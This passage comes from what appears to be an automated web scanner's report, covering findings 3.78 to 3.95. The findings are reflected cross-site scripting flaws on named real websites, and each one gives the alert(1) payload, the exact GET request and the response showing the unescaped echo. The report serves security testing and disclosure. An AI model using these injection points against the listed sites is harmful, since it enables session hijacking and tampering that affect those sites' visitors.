This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6cc87"><script>alert(1)</script>8cfab577b0c=1 HTTP/1.1
Host: www.kledy.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:38 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=iqqau8fkjllpvbb3hqmhp602h6oqa4uo; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/6cc87"><script>alert(1)</script>8cfab577b0c/1/page/2">
...[SNIP]...

3.78. http://www.kledy.us/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kledy.us
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eefaf"><script>alert(1)</script>9a3ca53fc2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?eefaf"><script>alert(1)</script>9a3ca53fc2e=1 HTTP/1.1
Host: www.kledy.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:22 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=n8tp05a1reegedblk8f7s5d21ievs6mu; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="/eefaf"><script>alert(1)</script>9a3ca53fc2e/1/page/2">
...[SNIP]...

3.79. http://www.klivio.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.klivio.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb47f"><script>alert(1)</script>7f036c475c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cb47f"><script>alert(1)</script>7f036c475c9=1 HTTP/1.1
Host: www.klivio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:17 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=85brkltkmtatmk3jhij5cc2p4k9n045i; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html dir="ltr" lang="de">
<head>
<meta name="msvalidate.01" content="C0594E2AB82AE90F82DE0425FCA782B
...[SNIP]...
<a href="/cb47f"><script>alert(1)</script>7f036c475c9/1/page/2">
...[SNIP]...

3.80. http://www.linotype.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linotype.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 540e4"><script>alert(1)</script>8556a2a5bf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?540e4"><script>alert(1)</script>8556a2a5bf1=1 HTTP/1.1
Host: www.linotype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=94b0a420170f784b00641222bf549198; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 26352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="/de/?540e4"><script>alert(1)</script>8556a2a5bf1=1">
...[SNIP]...

3.81. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.liverpoolonlinedegrees.co.uk
Path:	/2x/prequal.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1c92"><script>alert(1)</script>4e1431b8f70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2x/prequal.jsp?c1c92"><script>alert(1)</script>4e1431b8f70=1 HTTP/1.1
Host: www.liverpoolonlinedegrees.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE"
Cache-Control: public
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 28 Feb 2011 13:37:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=UZt+RC8KLuACM7wW6OWHpA**.app2-all1; Path=/
Set-Cookie: CLK=0#1298900228810; Expires=Tue, 26-Feb-2019 13:37:08 GMT; Path=/
Set-Cookie: CLK=0#1298900228810; Expires=Tue, 26-Feb-2019 13:37:08 GMT; Path=/
Content-Length: 32995


<html>
<head>
<title> University of Liverpool</title>
<link rel="stylesheet" href="Style.css" type="text/css"/>
<script language="JavaScript" type="text/javasc
...[SNIP]...
<Input Name="LeadSiteURL" Value="http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp?c1c92"><script>alert(1)</script>4e1431b8f70=1" Type="hidden" tabIndex="19"/>
...[SNIP]...

3.82. http://www.luxist.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.luxist.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24fbd"><script>alert(1)</script>0d4e127192f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?24fbd"><script>alert(1)</script>0d4e127192f=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.83. http://www.luxist.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.luxist.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81fb1"-alert(1)-"b351e110f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?81fb1"-alert(1)-"b351e110f9=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:07 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 62678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Luxury News from Lux
...[SNIP]...

s_265.channel="wb.luxist";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,luxist.com";
s_265.mmxgo = true;
s_265.prop1="Lifestyle";
s_265.prop2="Home";
s_265.prop12="http://www.luxist.com/?81fb1"-alert(1)-"b351e110f9=1";
s_265.prop16="Luxury News from Luxist - Fine Living, Dining, Apparel, Travel, Estates, Shopping";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="";
s_265.prop22=
...[SNIP]...

3.84. http://www.mapquesthelp.com/app/answers/detail/a_id/949/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mapquesthelp.com
Path:	/app/answers/detail/a_id/949/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6c2</script><script>alert(1)</script>3cd9eba429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/answers/detail/a_id/949/?ff6c2</script><script>alert(1)</script>3cd9eba429=1 HTTP/1.1
Host: www.mapquesthelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:20 GMT
Server: Apache
P3P: policyref="http://www.mapquesthelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUSUZCtjO5aYEsf9voh7vnDb3D3jOmdG634cg1rKT%7EfQfh9n7%7EUebI_ecEk26Xu2ju1FVahkwUfpuNBS2vDK54QctP0YQIpvV98ZndMYbvKg1KTVOrrj7FsJAWI01PjiXQAZjpe7ujAXx46zimr1NrhrdfLxRixYt5p09jjIUsIccnTRUDj3qxNbogyQPPwqjXOZo95UK07vtzKJg04mGP5ZieHt5oTmtm7sCKlc7B99%7EGwZCVx7_rOm2mQpz0sfsSsLjweweFNc9ma_QNwr_80I5F9dsTtGKXOvt5go9KPfYiTFXI3ukR_gs90rIpIwr40leQhNi6mJg%21; path=/; httponly
Content-Length: 36623
RNT-Time: D=127084 t=1298900240089142
RNT-Machine: 06
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/answers/detail/a_id/949/?ff6c2</script><script>alert(1)</script>3cd9eba429=1');
RightNow.Url.setSession('L2F2LzEvdGltZS8xMjk4OTAwMjQwL3NpZC8xYTE1Q0xuaw==');
RightNow.Event.setNoSessionCookies(true);
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","
...[SNIP]...

3.85. http://www.marque-nf.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marque-nf.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b176"><script>alert(1)</script>c9e55187d04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5b176"><script>alert(1)</script>c9e55187d04=1 HTTP/1.1
Host: www.marque-nf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Server: Microsoft-IIS/5.0
Date: Mon, 28 Feb 2011 13:37:15 GMT
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
X-Powered-By: ASP.NET
P3P: CP=CAO PSA OUR
Content-Length: 20814
Content-Type: text/html
Cache-control: private
Set-Cookie: WtID=%7BE6E05ECD%2D4695%2D41CA%2D9C30%2D9B41958F53F0%7D; expires=Thu, 09-May-2030 22:00:00 GMT; path=/

<html>
<head>
<title>Marque NF : La certification NF</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords" content="marque NF, certification, cer
...[SNIP]...
<a href="/Default.asp?5b176"><script>alert(1)</script>c9e55187d04=1&lang=English">
...[SNIP]...

3.86. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.masstransitmag.com
Path:	/online/article.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59e7"><script>alert(1)</script>bb98f3c1921 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online/article.jsp?f59e7"><script>alert(1)</script>bb98f3c1921=1 HTTP/1.1
Host: www.masstransitmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=E2306B625CE533A36C5496EA80CC1B52.transportation-app2; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/
...[SNIP]...
<fb:like href="www.masstransitmag.com/online/article.jsp?f59e7"><script>alert(1)</script>bb98f3c1921=1">
...[SNIP]...

3.87. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.masstransitmag.com
Path:	/online/article.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d27e2--><script>alert(1)</script>55b9e460f76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online/article.jsp?d27e2--><script>alert(1)</script>55b9e460f76=1 HTTP/1.1
Host: www.masstransitmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:14 GMT
Server: Apache
Set-Cookie: JSESSIONID=C4F1DA85CB37B838F1FD96BE016E085A.transportation-app2; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/
...[SNIP]...
<a href='http://twitter.com/share' rel='nofollow' class='twitter-share-button' expr:data-url='www.masstransitmag.com/online/article.jsp?d27e2--><script>alert(1)</script>55b9e460f76=1' expr:data-text='data:post.title' data-related='bloggerplugins:Tutorials and Widgets for Blogger' data-count='vertical' data-via='' data-lang='en'>
...[SNIP]...

3.88. http://www.mittelstandsblog.de/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mittelstandsblog.de
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdd56"><script>alert(1)</script>137f967236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdd56\\\"><script>alert(1)</script>137f967236 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fdd56"><script>alert(1)</script>137f967236=1 HTTP/1.1
Host: www.mittelstandsblog.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
X-Pingback: http://www.mittelstandsblog.de/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="http://www.mittelstandsblog.de/page/2/?fdd56\\\"><script>alert(1)</script>137f967236=1" title="Seite 2">
...[SNIP]...

3.89. http://www.mydaily.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mydaily.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36161"><script>alert(1)</script>e6407427aa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?36161"><script>alert(1)</script>e6407427aa6=1 HTTP/1.1
Host: www.mydaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:15 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999972
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 33144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="Geck
...[SNIP]...
<link rel="canonical" href="http://www.mydaily.com/?36161"><script>alert(1)</script>e6407427aa6=1" />
...[SNIP]...

3.90. http://www.netvouz.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netvouz.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3111"><script>alert(1)</script>e5d27863dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e3111"><script>alert(1)</script>e5d27863dc2=1 HTTP/1.1
Host: www.netvouz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:30 GMT
Server: IBM_HTTP_Server
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV"
Set-Cookie: JSESSIONID=0000X6n18LR-FJ_hyCHC4RIIGK_:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19772

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<link rel="alternate" type="application/rss+xml" href="/?e3111"><script>alert(1)</script>e5d27863dc2=1&feed=rss" title="Netvouz RSS feed" />
...[SNIP]...

3.91. http://www.newzealand.com/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newzealand.com
Path:	/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d791'-alert(1)-'a70e5c0a27d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm?5d791'-alert(1)-'a70e5c0a27d=1 HTTP/1.1
Host: www.newzealand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 28 Feb 2011 13:37:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: AKAMAI_LANG=us; expires=Sun, 29-May-2011 13:37:55 GMT; path=/; domain=.newzealand.com
Set-Cookie: DISPLAY_LANG=en; expires=Sun, 29-May-2011 13:37:55 GMT; path=/; domain=.newzealand.com
Content-Length: 110808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><title>Getting to New Zealand > New Zealand</title><meta name="descri
...[SNIP]...
the language subdirectory with market code for Akamai to switch cookies//Currently only applies to English markets...thisURL = available_lang[availlanglist][1].replace("/en/","/"+thismarket+"/") + '?5d791'-alert(1)-'a70e5c0a27d=1'//Check if current url contains a market 'root' //and if so disable all other market urls//as Akamai would have forced the market cookie isMarketURL = false;for (altmarketlist=0; altmarketlist<
...[SNIP]...

3.92. http://www.newzealand.com/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newzealand.com
Path:	/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16db5"><script>alert(1)</script>4d3d7ecd725 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm?16db5"><script>alert(1)</script>4d3d7ecd725=1 HTTP/1.1
Host: www.newzealand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 28 Feb 2011 13:37:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: AKAMAI_LANG=us; expires=Sun, 29-May-2011 13:37:48 GMT; path=/; domain=.newzealand.com
Set-Cookie: DISPLAY_LANG=en; expires=Sun, 29-May-2011 13:37:48 GMT; path=/; domain=.newzealand.com
Content-Length: 110853

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><title>Getting to New Zealand > New Zealand</title><meta name="descri
...[SNIP]...
<form id="searchform" name="searchform" method="post" action="/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm?16db5"><script>alert(1)</script>4d3d7ecd725=1" style="margin:0 0 10px 0;padding:0;">
...[SNIP]...

3.93. http://www.nydailynews.com/favicon.ico96572' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/favicon.ico96572'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 21739%3balert(1)//66f60bedeb1 was submitted in the REST URL parameter 1. This input was echoed as 21739;alert(1)//66f60bedeb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico96572'21739%3balert(1)//66f60bedeb1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:37:47 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 71477
Set-Cookie: sto-id-sg-web-8080=BPACAKAK; Expires=Mon, 28-Feb-2011 02:37:38 GMT; Path=/

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/favicon.ico96572'21739;alert(1)//66f60bedeb1';
}
//-->
...[SNIP]...

3.94. http://www.nydailynews.com/favicon.ico96572' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/favicon.ico96572'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b381'%3balert(1)//d789239fdef was submitted in the REST URL parameter 1. This input was echoed as 9b381';alert(1)//d789239fdef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /9b381'%3balert(1)//d789239fdef HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:38:54 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 71461
Set-Cookie: sto-id-sg-web-8080=CAACAKAK; Expires=Mon, 28-Feb-2011 02:37:37 GMT; Path=/

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
ad) {
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/9b381';alert(1)//d789239fdef';
}
//-->
...[SNIP]...

3.95. http://www.observer.com/author/rex-reed [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.observer.com
Path:	/author/rex-reed

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f7cf"><img%20src%3da%20onerror%3dalert(1)>cf90738becb was submitted in the REST URL parameter 2. This input was echoed as 4f7cf"><img src=a onerror=alert(1)>cf90738becb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /author/rex-reed4f7cf"><img%20src%3da%20onerror%3dalert(1)>cf90738becb HTTP/1.1
Host: www.observer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:38:52 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.6-1+lenny2
Cache-Control: max-age=300, must-revalidate
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Set-Cookie: SESS0787a3dbcceb3bde8559916a896fa4dd=926d853370bb6b2dab14279ff45a1625; expires=Wed, 23 Mar 2011 17:12:12 GMT; path=/; domain=.observer.com
Connection: close
Content-Length: 25024

